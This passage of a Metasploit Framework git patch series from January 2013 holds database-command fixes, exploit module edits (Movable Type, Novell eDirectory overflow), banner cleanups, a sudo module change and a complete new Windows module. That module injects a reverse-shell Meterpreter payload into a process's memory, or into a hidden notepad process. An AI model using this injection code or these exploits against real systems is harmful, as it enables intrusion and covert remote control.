host.destroy delete_count += 1 @@ -346,7 +339,7 @@ def cmd_hosts(*args) # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} hosts") if delete_count > 0 } ## @@ -1483,7 +1476,7 @@ def cmd_db_rebuild_cache print_error("The database is not connected") return end - + print_status("Purging and rebuilding the module cache in the background...") framework.threads.spawn("ModuleCacheRebuild", true) do framework.db.purge_all_module_details @@ -1714,4 +1707,3 @@ def each_host_range_chunk(host_ranges, &block) end end end - From b4f5c3b6eda732b89cf7b7392d5e8cab5b743d13 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 10:10:02 -0600 Subject: [PATCH 116/421] Fix up set_rhosts for all db commands --- lib/msf/ui/console/command_dispatcher/db.rb | 21 +++++++++------------ 1 file changed, 9 insertions(+), 12 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 60fe17e59243..b16fe1007bc3 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -363,10 +363,11 @@ def cmd_services(*args) default_columns = ::Mdm::Service.column_names.sort default_columns.delete_if {|v| (v[-2,2] == "id")} - host_ranges = [] - port_ranges = [] + host_ranges = [] + port_ranges = [] + rhosts = [] delete_count = 0 - search_term = nil + search_term = nil # option parsing while (arg = args.shift) @@ -417,7 +418,6 @@ def cmd_services(*args) output_file = ::File.expand_path(output_file) when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi @@ -507,7 +507,6 @@ def cmd_services(*args) addr = (host.scope ? host.address + '%' + host.scope : host.address ) rhosts << addr end - rhosts.uniq! if (mode == :delete) service.destroy @@ -527,7 +526,7 @@ def cmd_services(*args) # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} services") if delete_count > 0 } @@ -678,6 +677,7 @@ def cmd_creds(*args) host_ranges = [] port_ranges = [] + rhosts = [] svcs = [] search_term = nil @@ -731,7 +731,6 @@ def cmd_creds(*args) end when "-R" set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi when "-u","--user" @@ -828,7 +827,6 @@ def cmd_creds(*args) addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address ) rhosts << addr end - rhosts.uniq! creds_returned += 1 end @@ -841,7 +839,7 @@ def cmd_creds(*args) print_status("Wrote services to #{output_file}") end - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}." } end @@ -872,6 +870,7 @@ def cmd_notes(*args) set_rhosts = false host_ranges = [] + rhosts = [] search_term = nil while (arg = args.shift) @@ -895,7 +894,6 @@ def cmd_notes(*args) types = typelist.strip().split(",") when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi when '-h','--help' @@ -955,7 +953,6 @@ def cmd_notes(*args) addr = (host.scope ? host.address + '%' + host.scope : host.address ) rhosts << addr end - rhosts.uniq! end if (note.service) name = (note.service.name ? note.service.name : "#{note.service.port}/#{note.service.proto}") @@ -971,7 +968,7 @@ def cmd_notes(*args) # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0 } From 8bcf4a86ef5377358b0a1b14f0c259bb546d1082 Mon Sep 17 00:00:00 2001 From: booboule <booboule@gmail.com> Date: Wed, 23 Jan 2013 17:14:53 +0100 Subject: [PATCH 117/421] Update modules/exploits/multi/browser/java_jre17_method_handle.rb Wrong reference type (URL instead of OSVDB) --- modules/exploits/multi/browser/java_jre17_method_handle.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 623bc31c8e22..af8f2e1722ed 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -35,7 +35,7 @@ def initialize( info = {} ) 'References' => [ [ 'CVE', '2012-5088' ], - [ 'URL', '86352' ], + [ 'OSVDB', '86352' ], [ 'BID', '56057' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] From ff875d04e04d651efefb16f553ef931a494184a3 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 16:50:35 +0000 Subject: [PATCH 118/421] - RPATH changed to TARGETURI - both CVE numbers referenced - sightly changed exception handling --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 1802c450bb4b..77543f8d0694 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -37,7 +37,7 @@ def initialize(info = {}) ], 'References' => [ - #['CVE', '2012-6315'], superseded by CVE-2013-0209 (duplicate) + ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate) ['CVE', '2013-0209'], ['URL', 'http://www.sec-1.com/blog/?p=402'], ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] @@ -65,7 +65,7 @@ def initialize(info = {}) register_options( [ - OptString.new('RPATH', [true, 'The URI path of the Movable Type installation', '/mt']) + OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt']) ], self.class) end @@ -75,7 +75,7 @@ def check print_status("#{@peer} - Sending check...") begin res = http_send_raw(fingerprint) - rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout + rescue Rex::ConnectionError return end if (res) @@ -96,7 +96,7 @@ def exploit end def http_send_raw(cmd, timeout=20) - path = normalize_uri(datastore['RPATH']) + '/mt-upgrade.cgi' + path = normalize_uri(target_uri.path + '/mt-upgrade.cgi') send_request_cgi( { 'uri' => path, From c47392f5d17628e6bdf6a97c3166abfcfd7227fd Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 16:57:30 +0000 Subject: [PATCH 119/421] normalize_uri and path fix --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 77543f8d0694..43224ee2d784 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -96,7 +96,7 @@ def exploit end def http_send_raw(cmd, timeout=20) - path = normalize_uri(target_uri.path + '/mt-upgrade.cgi') + path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' send_request_cgi( { 'uri' => path, From dd0fdac73c747138fc425ec534fe124c4863afbb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 23 Jan 2013 18:19:14 +0100 Subject: [PATCH 120/421] fix indent --- modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 12a79339b61f..fc01baa7b31c 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -112,8 +112,8 @@ def exploit pkt << "\x00" # reserved pkt << "\x17" # Login Object FunctionCode (23) pkt << "\x00\xa7" # SubFuncStrucLen - pkt << "\x18" # SubFunctionCode - pkt << "\x90\x90" # object type + pkt << "\x18" # SubFunctionCode + pkt << "\x90\x90" # object type pkt << "\x50" # ClientNameLen pkt << rand_text(7) jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string From ca144b9e8472404393241f621f8e7311911af9bf Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 11:40:12 -0600 Subject: [PATCH 121/421] msftidy fix --- modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index fc01baa7b31c..257fdd077fb3 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -105,7 +105,7 @@ def exploit pkt << "\x00\x00\x00\x00" # request_size (filled later) pkt << "\x00\x00\x00\x01" # version (1) pkt << "\x00\x00\x00\x05" # reply buffer size - pkt << "\x22\x22" # cmd + pkt << "\x22\x22" # cmd pkt << "\x01" # sequence number pkt << res[11] # connection number pkt << "\x00" # task number From f50c7ea55172531588e3991716722c48c88d5283 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 11:43:39 -0600 Subject: [PATCH 122/421] A version number helps deciding which exploit to use --- modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 257fdd077fb3..36b0020b425d 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Novell eDirectory Buffer Overflow', + 'Name' => 'Novell eDirectory 8 Buffer Overflow', 'Description' => %q{ This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while From afa32c7552f62a2853af75b2485300e16657cf26 Mon Sep 17 00:00:00 2001 From: booboule <booboule@gmail.com> Date: Wed, 23 Jan 2013 20:18:24 +0100 Subject: [PATCH 123/421] Update external/source/exploits/cve-2012-5076_2/Makefile Wrong directory path --- external/source/exploits/cve-2012-5076_2/Makefile | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/external/source/exploits/cve-2012-5076_2/Makefile b/external/source/exploits/cve-2012-5076_2/Makefile index e93911b8ed42..1a84229b80a7 100755 --- a/external/source/exploits/cve-2012-5076_2/Makefile +++ b/external/source/exploits/cve-2012-5076_2/Makefile @@ -11,8 +11,8 @@ CLASSES = \ all: $(CLASSES:.java=.class) install: - mv Exploit.class ../../../../data/exploits/cve-2013-0422/ - mv B.class ../../../../data/exploits/cve-2013-0422/ + mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/ + mv B.class ../../../../data/exploits/cve-2012-5076_2/ clean: rm -rf *.class From 537e12cf1643d3e875217ad03ef962bdfac6fdc4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 23 Jan 2013 13:59:34 -0600 Subject: [PATCH 124/421] Render the banners nicely --- lib/msf/ui/logos/branded-longhorn.txt | 1 - lib/msf/ui/logos/cowsay.txt | 1 - lib/msf/ui/logos/missile-command.txt | 3 ++- lib/msf/ui/logos/ninja.txt | 3 +-- lib/msf/ui/logos/null-pointer-deref.txt | 1 + 5 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/msf/ui/logos/branded-longhorn.txt b/lib/msf/ui/logos/branded-longhorn.txt index df7e2f745f43..2b49662ab41d 100644 --- a/lib/msf/ui/logos/branded-longhorn.txt +++ b/lib/msf/ui/logos/branded-longhorn.txt @@ -1,4 +1,3 @@ - , , / \ ((__---,,,---__)) diff --git a/lib/msf/ui/logos/cowsay.txt b/lib/msf/ui/logos/cowsay.txt index 7b34488352fe..dbe42d87aca8 100644 --- a/lib/msf/ui/logos/cowsay.txt +++ b/lib/msf/ui/logos/cowsay.txt @@ -1,4 +1,3 @@ - # cowsay++ ____________ < metasploit > diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt index aedd60471100..a8a0a1d14f66 100644 --- a/lib/msf/ui/logos/missile-command.txt +++ b/lib/msf/ui/logos/missile-command.txt @@ -27,5 +27,6 @@ ################################################################################ # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # ################################################################################ - http://metasploit.pro + http://metasploit.pro %clr + diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt index 9bc984822b9f..3404d7174b4e 100644 --- a/lib/msf/ui/logos/ninja.txt +++ b/lib/msf/ui/logos/ninja.txt @@ -27,7 +27,6 @@ # # ### # # ## ######################## ## ## ## ## - - http://metasploit.pro + http://metasploit.pro %clr diff --git a/lib/msf/ui/logos/null-pointer-deref.txt b/lib/msf/ui/logos/null-pointer-deref.txt index 9a9c1fa0bbd6..dcf58a6db4e7 100644 --- a/lib/msf/ui/logos/null-pointer-deref.txt +++ b/lib/msf/ui/logos/null-pointer-deref.txt @@ -36,3 +36,4 @@ Aiee, Killing Interrupt handler %redKernel panic: Attempted to kill the idle task! In swapper task - not syncing %clr + From d3549823458e143917b09c028af4ddcda36fadd0 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Fri, 18 Jan 2013 22:41:44 -0600 Subject: [PATCH 125/421] Fix grammar on description for webcam --- modules/post/windows/manage/webcam.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index 6b838d04aacd..aab47587c388 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb @@ -16,8 +16,8 @@ def initialize(info={}) super(update_info(info, 'Name' => 'Windows Manage Webcam', 'Description' => %q{ - This module will allow you to these things with your target's webcam: detect, - take a snapshot. + This module will allow the user to detect installed webcams (with + the LIST action) or take a snapshot (with the SNAPSHOT) action. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -132,4 +132,5 @@ def list_webcams(show=false) return webcams end -end \ No newline at end of file +end + From e93b7ffcaf43ef5344ea24aab76ef2c11148a0f8 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 14:07:48 -0600 Subject: [PATCH 126/421] Add Carlos Perez's payload injection module See #1201 --- .../exploits/windows/local/payload_inject.rb | 127 ++++++++++++++++++ 1 file changed, 127 insertions(+) create mode 100644 modules/exploits/windows/local/payload_inject.rb diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb new file mode 100644 index 000000000000..73bb94aa4520 --- /dev/null +++ b/modules/exploits/windows/local/payload_inject.rb @@ -0,0 +1,127 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Memory Payload Injection Module', + 'Description' => %q{ + This module will inject into the memory of a process a specified windows payload. + If a payload or process is not provided one will be created by default + using a reverse x86 TCP Meterpreter Payload. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Carlos Perez <carlos_perez[at]darkoperator.com>' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> "Oct 12 2011" + )) + + register_options( + [ + OptInt.new('PID', + [false, 'Process Identifier to inject of process to inject payload.']) + ], self.class) + end + + # Run Method for when run command is issued + def exploit + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + + pid = datastore['PID'] + + if pid == 0 + pid = create_temp_proc() + end + + if payload.send(:pinst).arch.first =~ /64/ and client.platform =~ /x86/ + print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") + print_error("Migrate to an x64 process and try again.") + return false + else + inject_into_pid(pid,datastore['NEWPROCESS']) + end + end + + # Checks the Architeture of a Payload and PID are compatible + # Returns true if they are false if they are not + def arch_check(pid) + # get the pid arch + client.sys.process.processes.each do |p| + # Check Payload Arch + if pid == p["pid"] + print_status("Process found checking Architecture") + if payload.send(:pinst).arch.first == p['arch'] + print_good("Process is the same architecture as the payload") + return true + else + print_error("The PID #{ p['arch']} and Payload #{payload.send(:pinst).arch.first} architectures are different.") + return false + end + end + end + end + + # Creates a temp notepad.exe to inject payload in to given the payload + # Returns process PID + def create_temp_proc() + windir = client.fs.file.expand_path("%windir%") + # Select path of executable to run depending the architecture + if payload.send(:pinst).arch.first== "x86" and client.platform =~ /x86/ + cmd = "#{windir}\\System32\\notepad.exe" + elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x64/ + cmd = "#{windir}\\System32\\notepad.exe" + elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x86/ + cmd = "#{windir}\\Sysnative\\notepad.exe" + elsif payload.send(:pinst).arch.first == "x86" and client.platform =~ /x64/ + cmd = "#{windir}\\SysWOW64\\notepad.exe" + end + # run hidden + proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + return proc.pid + end + + def inject_into_pid(pid,newproc) + print_status("Performing Architecture Check") + # If architecture check fails and a new process is wished to inject to one with the proper arch + # will be created + if arch_check(pid) + pid = create_temp_proc() if newproc + print_status("Injecting #{payload.send(:pinst).name} into process ID #{pid}") + begin + print_status("Opening process #{pid}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + print_status("Generating payload") + raw = payload.generate + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) + # Ensure memory is set for execution + host_process.memory.protect(mem) + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, raw) + host_process.thread.create(mem, 0) + print_good("Successfully injected payload in to process: #{pid}") + rescue ::Exception => e + print_error("Failed to Inject Payload to #{pid}!") + print_error(e.to_s) + end + end + end +end \ No newline at end of file From 40dcbe0e89df2bbaacab460a21edf00b2714b582 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 23 Jan 2013 14:16:46 -0600 Subject: [PATCH 127/421] Fix escaping, whitespace Since banners are now just data and not code, they don't need their backslashes escaped any more. --- lib/msf/ui/logos/cow-head.txt | 4 ++-- lib/msf/ui/logos/missile-command.txt | 4 +--- lib/msf/ui/logos/null-pointer-deref.txt | 4 +--- lib/msf/ui/logos/wake-up-neo.txt | 2 +- lib/msf/ui/logos/workflow.txt | 21 ++++++++++----------- 5 files changed, 15 insertions(+), 20 deletions(-) diff --git a/lib/msf/ui/logos/cow-head.txt b/lib/msf/ui/logos/cow-head.txt index 16ed1021d6b7..479ea81822d8 100644 --- a/lib/msf/ui/logos/cow-head.txt +++ b/lib/msf/ui/logos/cow-head.txt @@ -11,7 +11,7 @@ ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ - ( 3 C ) /|___ / Metasploit! \\ - ;@'. __*__,." \\|--- \\_____________/ + ( 3 C ) /|___ / Metasploit! \ + ;@'. __*__,." \|--- \_____________/ '(.,...."/ %clr diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt index a8a0a1d14f66..5192490da219 100644 --- a/lib/msf/ui/logos/missile-command.txt +++ b/lib/msf/ui/logos/missile-command.txt @@ -27,6 +27,4 @@ ################################################################################ # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # ################################################################################ - http://metasploit.pro -%clr - + http://metasploit.pro%clr diff --git a/lib/msf/ui/logos/null-pointer-deref.txt b/lib/msf/ui/logos/null-pointer-deref.txt index dcf58a6db4e7..38a532b541a6 100644 --- a/lib/msf/ui/logos/null-pointer-deref.txt +++ b/lib/msf/ui/logos/null-pointer-deref.txt @@ -34,6 +34,4 @@ Stack: 90909090990909090990909090 %yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr Aiee, Killing Interrupt handler %redKernel panic: Attempted to kill the idle task! -In swapper task - not syncing -%clr - +In swapper task - not syncing%clr diff --git a/lib/msf/ui/logos/wake-up-neo.txt b/lib/msf/ui/logos/wake-up-neo.txt index 2f9fd96793b0..1ee17795575e 100644 --- a/lib/msf/ui/logos/wake-up-neo.txt +++ b/lib/msf/ui/logos/wake-up-neo.txt @@ -15,7 +15,7 @@ .-;--''--.._` ` ( .' / ` , ` ' Q ' - , , `._ \\ + , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' diff --git a/lib/msf/ui/logos/workflow.txt b/lib/msf/ui/logos/workflow.txt index 1437bb8eed0f..a470eebd2418 100644 --- a/lib/msf/ui/logos/workflow.txt +++ b/lib/msf/ui/logos/workflow.txt @@ -2,21 +2,20 @@ %whi| METASPLOIT by Rapid7 | %whi+---------------------------+---------------------------+ %whi| %blu__________________ %whi| | - %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi| - %whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi| - %whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi| - %whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi| - %whi| %blu// \\\\ %whi| %grn|______________________\\ %whi| - %whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi| - %whi| %blu// \\\\ %whi| %grn********************* %whi| + %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======[%red*** %whi| + %whi| %blu)%yel=%blu\ %whi| %grn| %whiEXPLOIT %grn\ %whi| + %whi| %blu// \\ %whi| %grn|_____________\_______ %whi| + %whi| %blu// \\ %whi| %grn|==[%whimsf >%grn]============\ %whi| + %whi| %blu// \\ %whi| %grn|______________________\ %whi| + %whi| %blu// %whiRECON %blu\\ %whi| %grn\(@)(@)(@)(@)(@)(@)(@)/ %whi| + %whi| %blu// \\ %whi| %grn********************* %whi| %whi+---------------------------+---------------------------+ - %whi| o O o | %yel\\'\\/\\/\\/'/ %whi| + %whi| o O o | %yel\'\/\/\/'/ %whi| %whi| o O | %yel)%whi======%yel( %whi| %whi| o | %yel.' %whiLOOT %yel'. %whi| - %whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi| - %whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi| + %whi| %red|^^^^^^^^^^^^^^|l%red___ %whi| %yel/ %grn_||__ %yel\ %whi| + %whi| %red| %whiPAYLOAD %red|%whi""\%red___, %whi| %yel/ %grn(_||_ %yel\ %whi| %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| %whi+---------------------------+---------------------------+%clr - %clr From d0382b68c71165b0c6680f039ba3200870546939 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 23 Jan 2013 14:18:40 -0600 Subject: [PATCH 128/421] One more backslash --- lib/msf/ui/logos/figlet.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/logos/figlet.txt b/lib/msf/ui/logos/figlet.txt index 1567ea1774f8..edabcbeba2d6 100644 --- a/lib/msf/ui/logos/figlet.txt +++ b/lib/msf/ui/logos/figlet.txt @@ -3,5 +3,5 @@ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ - |/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\ + |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ From e9205945341234b3f65b4e6456cb916892de42f0 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 23 Jan 2013 14:23:38 -0600 Subject: [PATCH 129/421] Whitespace cleanup, no blank lines plz --- lib/msf/ui/logos/3kom-superhack.txt | 3 +-- lib/msf/ui/logos/cow-head.txt | 3 +-- lib/msf/ui/logos/cowsay.txt | 1 - lib/msf/ui/logos/figlet.txt | 1 - lib/msf/ui/logos/i-heart-shells.txt | 1 - lib/msf/ui/logos/ninja.txt | 4 +--- 6 files changed, 3 insertions(+), 10 deletions(-) diff --git a/lib/msf/ui/logos/3kom-superhack.txt b/lib/msf/ui/logos/3kom-superhack.txt index 4d1123f35429..e1fda3898167 100644 --- a/lib/msf/ui/logos/3kom-superhack.txt +++ b/lib/msf/ui/logos/3kom-superhack.txt @@ -16,5 +16,4 @@ |______________________________________________________________________________| | | | http://metasploit.pro | -|______________________________________________________________________________| -%clr +|______________________________________________________________________________|%clr diff --git a/lib/msf/ui/logos/cow-head.txt b/lib/msf/ui/logos/cow-head.txt index 479ea81822d8..d7746ac21992 100644 --- a/lib/msf/ui/logos/cow-head.txt +++ b/lib/msf/ui/logos/cow-head.txt @@ -13,5 +13,4 @@ ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ - '(.,...."/ -%clr + '(.,...."/%clr diff --git a/lib/msf/ui/logos/cowsay.txt b/lib/msf/ui/logos/cowsay.txt index dbe42d87aca8..15512d455609 100644 --- a/lib/msf/ui/logos/cowsay.txt +++ b/lib/msf/ui/logos/cowsay.txt @@ -6,4 +6,3 @@ \ (oo)____ (__) )\ ||--|| * - diff --git a/lib/msf/ui/logos/figlet.txt b/lib/msf/ui/logos/figlet.txt index edabcbeba2d6..972e7363c00f 100644 --- a/lib/msf/ui/logos/figlet.txt +++ b/lib/msf/ui/logos/figlet.txt @@ -4,4 +4,3 @@ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ - diff --git a/lib/msf/ui/logos/i-heart-shells.txt b/lib/msf/ui/logos/i-heart-shells.txt index aeaff31aaae3..5c1c64dd8980 100644 --- a/lib/msf/ui/logos/i-heart-shells.txt +++ b/lib/msf/ui/logos/i-heart-shells.txt @@ -6,4 +6,3 @@ %whiIIIIII %red'YvP'%clr `-.__|__.-' I love shells --egypt - diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt index 3404d7174b4e..70a5317a2473 100644 --- a/lib/msf/ui/logos/ninja.txt +++ b/lib/msf/ui/logos/ninja.txt @@ -27,6 +27,4 @@ # # ### # # ## ######################## ## ## ## ## - http://metasploit.pro -%clr - + http://metasploit.pro%clr From 3b65f31d956f5e54e364df865871b43de4d064fd Mon Sep 17 00:00:00 2001 From: lmercer <lmercer@mit.edu> Date: Wed, 23 Jan 2013 15:23:40 -0500 Subject: [PATCH 130/421] post/multi/manage/sudo improved with the PASSWORD option as described in Redmine Feature #7581 --- modules/post/multi/manage/sudo.rb | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index e2e1273030f5..8b7b2f672f00 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -30,7 +30,9 @@ def initialize(info={}) versions from 2008 and later which support -A. }, 'License' => MSF_LICENSE, - 'Author' => [ 'todb <todb[at]metasploit.com>'], + 'Author' => [ 'todb <todb[at]metasploit.com>', + 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option + ], 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ @@ -39,6 +41,11 @@ def initialize(info={}) ], 'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter' )) + + register_options( + [ + OptString.new('PASSWORD', [false, 'The password to use when running sudo.']) + ], self.class) end # Run Method for when run command is issued @@ -57,7 +64,12 @@ def run end def get_root - password = session.exploit_datastore['PASSWORD'] + if datastore['PASSWORD'] + password = datastore['PASSWORD'] + else + password = session.exploit_datastore['PASSWORD'] + end + if password.to_s.empty? print_status "No password available, trying a passwordless sudo." else From cfde24785c771cb64206e55a5712c1dcb9e256a6 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 14:23:58 -0600 